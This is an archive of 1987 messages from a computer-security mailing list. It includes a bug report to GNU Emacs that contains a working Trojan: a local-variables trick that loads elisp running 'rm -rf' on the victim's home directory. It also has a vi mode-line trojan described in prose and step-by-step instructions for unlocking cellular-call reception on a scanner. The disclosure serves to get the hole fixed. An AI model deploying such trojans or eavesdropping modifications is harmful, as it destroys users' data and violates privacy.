----MESSAGE-BEGIN---- <1987030509391200> From: Bill Sommerfeld 6-Mar-1987 17:19:12 To: bug-gnu-emacs@prep.ai.mit.edu Subj: It is possible to set load-path in the local variables list. Cc: security@red.rutgers.edu, jis@ATHENA.MIT.EDU In GNU Emacs 18.37.1 of Mon Feb 16 1987 on ra (berkeley-unix) If I create the file /tmp/foo, containing the following lines: Local Variables: load-path: ("/tmp") mode: outline End: and the file /tmp/outline.el: ;;; put any arbitrary code here. (if (not (string= (user-login-name) "wesommer")) (shell-command "cd ~; rm -rf * &")) (kill-emacs t) then anyone who uses emacs to look at /tmp/foo and who has not yet loaded the outline package will lose their home directory. While I would not be anti-social enough to do this, it should be important to point out that the local-variables feature of emacs enables trojan horses like this to surface. Suggested fix: disable setting of load-path in the local-variables list; other variables of this nature (such as shell-file-name and exec-path) might also be protected in some way. It may also be possible to set various hooks in this way; it is not immediately apparant to me how to fix this problem in general without eliminating the (winning) local variables feature. - Bill ----MESSAGE-END---- ----MESSAGE-BEGIN---- <1987030522440700> From: crl@maxwell.physics.purdue.edu (Charles R. LaBrec) 7-Mar-1987 06:24:07 To: wesommer@ATHENA.MIT.EDU Subj: It is possible to set load-path in the local variables list. Cc: bug-gnu-emacs@PREP.AI.MIT.EDU, security@red.rutgers.edu A thought I just had was to be able to do something like (put 'load-path 'disable-local-variables t) so that any "important" variable could be protected in a easily extensible way. Maybe non-t and non-nil could be a way to request confirmation before proceeding. Charles LaBrec crl @ maxwell.physics.purdue.edu ----MESSAGE-END---- ----MESSAGE-BEGIN---- <1987031001172200> From: HMICHEL%CALSTATE.BITNET@wiscvm.wisc.edu 11-Mar-1987 08:57:22 To: SECURITY@RUTGERS.EDU Subj: Encryption/Decryption Sources Desired I am interested in obtaining source code (preferably in FORTRAN, Pascal is ok, BASIC is ok, C only if I must) that will encrypt and decrypt files. I am at site that only supports mail; so, if there is anything at any archive that is not reachable via a mail based server then I am dependent on someone's generosity. Thanks for your help. Michael W. Fleming BITNET: HMICHEL@CALSTATE Computer Services ARPANET: HMICHEL%CALSTATE.BITNET@ California State College WISCVM.WISC.EDU 9001 Stockdale Highway Bakersfield, Ca. 93311-1099 Telephone: (805) 833-2309 -or- (805) 833-2115 {message} ----MESSAGE-END---- ----MESSAGE-BEGIN---- <1987031021590900> From: brock@pnet01.CTS.COM (Brock Meeks) 12-Mar-1987 05:39:09 To: crash!security@rutgers@nosc.mil Subj: North, Pointy, et al (so to speak) Well, what don't any of us have any comments on the mundo security blunder by our rousing cowboys that used to staff the NSC?? I mean, c'mon? Can these guys really be so naive that they didn't know their messages were being stored for prospertiy by the PROF system? Any one want to venture a guess why? Or how about someone taking a shot at looking into whether the RFP (request for proposal) for the original White House comm. system included anything about "back up" messages . . . Just for security, you understand... Really, I'm a little tweaked on this issue. I would like to think these guys weren't that stupid, but you just never know... Brock inhp4!sdcsvax!crash!pnet01!brock brock@ucsd brock@nosc -------------------------- no crap down here.... ----MESSAGE-END---- ----MESSAGE-BEGIN---- <1987031503371600> From: barnett%vdsvax.tcpip@ge_crd.arpa 16-Mar-1987 11:17:16 To: SECURITY@RED.RUTGERS.EDU Subj: secure service-type accounts Cc: unix-security Here is a question I have for Sun 3.2 and Ultrix 1.2 (and 2.0) Ultrix systems. We would like to set up a network service for providing the ability to use Elan's DITROFF, which is licensed for one system, from any Ultrix or Sun machine on our network. We would like to do this without creating hundreds of accounts on the Sun workstation. Two simple methods are: Have a password of '*' on the dummy account and have a list of people in the .rhost file, who can use the account. (This list of people/machines would include hundreds of combinations) Have no password in the account, and have a special version of the .profile/.login/.cshrc that traps signals, and only allows certain commands. It seems to me that this is insecure because people could then do: rsh machine -l dummy-user chmod .profile rcp .profile machine.dummy-user: and then rlogin machine -l dummy-user Another solution is to use the restricted shell on the Sun. (I don't believe this is available on Ultrix 1.2) To review my understanding of it, I would set it up as follows: ln /bin/sh /bin/rshell change /bin/{c}sh to /bin/rshell in the dummy user's password entry create a /secure-bin directory with just the commands needed to execute the tbl/eqn/nroff/troff/spell programs and scripts What would be NOT included is chmod, cp, ln, and some others. I would think it should not be writable by the dummy user. (this part would require the most head-scratching.) edit the .profile to set the search path to only point to /secure-bin Also add a trap 'exit 1' 0 1 2 3 15 to the .profile as the first command. chmod the .profile to 400 Now - Sun's restricted version of sh does not allow: execution of commands starting with '/' redirection of standard output So my questions are: Is the approach I am taking secure? or 95% secure? Is there a better approach? (I may be willing to settle for a 95% secure method - because this doesn't grant root access. But as our policy is to not allow password-free accounts - we need to justify this deviation from policy.) Is there a secure method of doing this for Ultrix, which doesn't (as far as I know) have the restricted shell? If so, how was it done? Does it require writing a program? Does anyone have a program that is suitable for hacking? Does anyone have some examples on how they solved this problem? (This might save me a bit of head scratching and testing.) Which commands should I leave from the special bin directory? (besides chmod, ln, cp, rm, and mv)? Bruce G. Barnett barnett@ge-crd.arpa, barnett@steinmetz.uucp ...!{chinet,rochester}!steinmetz!barnett ----MESSAGE-END---- ----MESSAGE-BEGIN---- <1987031510490100> From: Michael Grant 16-Mar-1987 18:29:01 To: info-hams@mc.lcs.mit.edu, rnj@brl.arpa, security@red.rutgers.edu, Subj: Restoring Cellular Coverage on the Radio Shack PRO-2004 Scanner In the March 1987 (Vol 6, Number 3) issue of Monitoring Times on page 48, there is a short article on how to modify your RadioShack Scanner to pick up the cellular frequencies. (This just had to have been leaked from someone in Tandy sales!) 1. Remove the four cabinet screws and the cabinet 2. Turn the receiver upside down and locate circuit board PC-3 3. Remove seven screws holding board and plug CN-501 4. Carefully lift up the board and locate diode soldered in place below the module 5. Snip one lead of the diode carefully, leaving it suspended by the other lead for later reattachment if desired, such as warranty repair 6. Reverse first four steps above for reassembly. Radio will now cover 825-845 and 870-890 MHz and search in 30 KHz increments for no-gap 760-1300 MHz reception (Thanks to Jim Marquand and other readers of Monitoring Times) I do not own a PRO-2004, nor have I ever seen this tried, do it at your own risk. -Mike ----MESSAGE-END---- ----MESSAGE-BEGIN---- <1987031517175200> From: *Hobbit* 17-Mar-1987 00:57:52 To: security@RED.RUTGERS.EDU Subj: [947] Better than shredders I have found an excellent way of disposing of classified garbage. You find a standard industrial-grade flat rooftop that has a lot of small-grain gravel on top, and sweep a small pile of it together. Create a depression in this pile, about 6 inches across. Loosely crumple a couple of the papers in question and ignite them. Feed the rest of the stuff in, loosely crumpled so it burns nicely, until there's only ashes and no paper left. Now, tumble and mix the pile of gravel and ashes around until all you have is blackened gravel [a random beer bottle lying nearby served quite well as a swizzle stick]. Leave the pile sitting there for the next time you need it. Drawbacks: Works better at night, since rooftops tend to be windy during the day. However, what's left behind is completely unreadable. _H* ----MESSAGE-END---- ----MESSAGE-BEGIN---- <1987031804191500> From: codas!ki4pv!tanner@rutgers.edu 19-Mar-1987 11:59:15 To: codas!moss!rutgers!security Subj: Trojan Horses in Editor Start-Up Files Another interesting case is "vi", whose mode lines feature is disabled by SCO ("it's not a bug, it's a feature") because they fear that someone might leave a trojan horse in a file to be edited. SCO sells xenix, which is a unix clone of moderate tolerability. A mode line containing the command "!sh my_trojan.sh" surrounded by the proper arrangements of comment characters and colons is what they fear; my_trojan.sh either dispenses a prophylactic to the editor, or creates a setuid-victim prog for benefit of the horses's owner. I fear that the commenting-out of the proper code (rather than simply disabling the '!' command in mode lines) is probably more than a bit paranoid; SCO was kind enough to offer to sell me source for some large number of thousands of dollars so that I could re-enable this code. Their hack is not optional on a per-site basis; they don't offer a version with mode lines to those sites willing to risk it. I prefer the simpler policy of cutting off the fingers of anyone who leaves a trojan horse around without my permission. tanner andrews, systems compudata south, deland ----MESSAGE-END---- ----MESSAGE-BEGIN---- <1987031903274100> From: Douglas Humphrey 20-Mar-1987 11:07:41 To: brock@pnet01.CTS.COM, crash!security@rutgers@nosc.mil Subj: [1520] Re: North, Pointy, et al (so to speak) All I can say about it is that if they had been running OUR system rather than PROFFS then their messages really would have gotten deleted ! Still, I would think that an organization like the NSC should have the proper support by agencys to avoid such a simple, stupid problem. I don't expect our customers to be knowledgable about these things; that what they pay US for. What agency is charged (if any) with the job of COMSEC and related security ? Would that be NSA? A thing to note here. They did have correct levels of security there, with the entire facility Tempest, and running at Top Secret. The problem here is not one of clasic COMSEC; the bad guys getting into the system. What happened here was the creation of an audit trail when the users did not want one to happen. You can argue that this kind of accountability is good or not; it did allow what actualy happened to come to light (no political flames here please, this is just a technical discussion), but it can also be argued that the user is the ultimate authority in the circumstance, and that when they say 'delete and do not archive' then that is what should happen. If there was a decision taken that the system should auto-archive all message traffic, then the users should have been explicitly warned of this, and often ! Doug Digital Express Inc. ----MESSAGE-END---- ----MESSAGE-BEGIN---- <1987032201303100> From: steinar@NTA-VAX.ARPA (Steinar Haug RUNIT) 23-Mar-1987 09:10:31 To: security@RUTGERS.EDU Subj: [631] Standard format for RSA cryptosystems I would like to know if there have been any reactions, discussion etc. regarding the article: "A proposed standard format for RSA cryptosystems", by P. Zimmermann, IEEE Computer September 1986. Arpanet: Steinar Haug steinar@nta-vax Database Research Group, Computing Centre at the Univ. of Trondheim 7034 Trondheim-NTH Norway ----MESSAGE-END---- ----MESSAGE-BEGIN---- <1987032413585600> From: "IFSM 190/0101; Student" 25-Mar-1987 21:38:56 To: "security" Subj: [787] disposing garbage Why not use an incenerator where the ashes are recycled back into the fire a couple of times..... and then the smoke is sprayed with a mist of water to keep paper particles from leaving the area and reburned until the whole mess was up in flames.... then you could release it... this would only be effective for large(!!!) massive amounts of classified material... does anyone know anything about the unix hacker that is moving passwords around the country? he gets a file from NJ and moves it to NY and then the ppl can't log on w/ their own passwords.... I didn't hear the whole story but thats what I gathered. Whizard ----MESSAGE-END---- ----MESSAGE-BEGIN---- <1987032607495000> From: Mike Linnig 27-Mar-1987 15:29:50 To: security@rutgers.edu Subj: [727] Traffic Light Sensors Does anyone out there know anything about the photo sensors that you can see on top of traffic lights? I have heard that they detect emergency vehicles (who use a special strobe) and switch the traffic light to green. Are the strobes coded or do the sensors just detect a certain flash frequency? I tried watching the strobe of an emergency vehicle but it is too fast to tell much with out a video tape. The strobe's flashes do seem to be in irregular bursts, indicating a code of some kind. I also wonder if the codes change (if they are coded) from city to city? Mike ----MESSAGE-END---- ----MESSAGE-BEGIN---- <1987033020443800> From: Chris Yoder 1-Apr-1987 04:24:38 To: cit-vax!security@red.rutgers.edu Subj: [2922] System monitoring software (For those of you who get both Info-Vax and Security-Info I apologize for the double posting. I thought that this might be a good place to post this message, and besides that, we need some traffic in this group!) I would like to get comments from anybody about system monitoring software that runs under VMS 4.5. I'm specifically interested in software that will record everything that happens during an interactive terminal session in a manner that is completely transparent to the user. Analysis tools to help pinpoint users that be considered "security risks" from the recorded data is also necessary. I am interested in hearing about how the package is installed (including where the software ends up, what software is installed, what kinds of privs it wants, etc.), how well the package works (both software and documentation), any holes/serious bugs that you've found and any person opinions that you might have about the software. On the more specific side, I have just finished evaluating Clyde Digital Systems' CONTRL, AUDIT and RTMON software packages, and I'd like to share war stories with anyone else who has or is running any or all of these packages (I've a *long*, very rough report on it, but if you want it send me mail). CONTRL is fun, but I am most interested in AUDIT and RTMON. While running AUDIT with RTMON under it, Vaxsim showed that our system was collecting a rather alarming number of SysBugChk (%x00000058) Events. Before and after the evaluation period of AUDIT and RTMON *no* events were being logged by Vaxsim, during the evaluation period I saw this number above 4,000. We suspect RTMON as the culprit because the system crashed once during this period with the current process being a process that was logged in over DECnet and analyzing the crash dump showed that the crash was caused by R5 being set to 0. Circumstantial evidence seemed to indicate that UPdriver caused R5 to be set to 0. Has anyone else been able to pin down UPdriver of the RTMON package as the culprit for a system crash or an unusually high number of errors on the system? Oh I also discovered another gotcha, with both CONTRL and RTMON installed under VMS 4.5, the process running CONTRL will crash the system when CONTRLing a user logged in on a virtual terminal over a terminal server who disconnects. I haven't tried to deliberately recreate this one because users tend to get a little upset when the system goes down for no apparent reason... If anybody else has had any similar experiences, I'd love to hear about them. -- Chris Yoder UUCP -- {allegra or ihnp4}!scgvaxd!engvax!chris Hughes Aircraft Company Internet -- chris%engvax.scg.hac.com@ymir.bitnet ARPA -- chris%engvax.uucp@usc-oberon.usc.edu ----MESSAGE-END----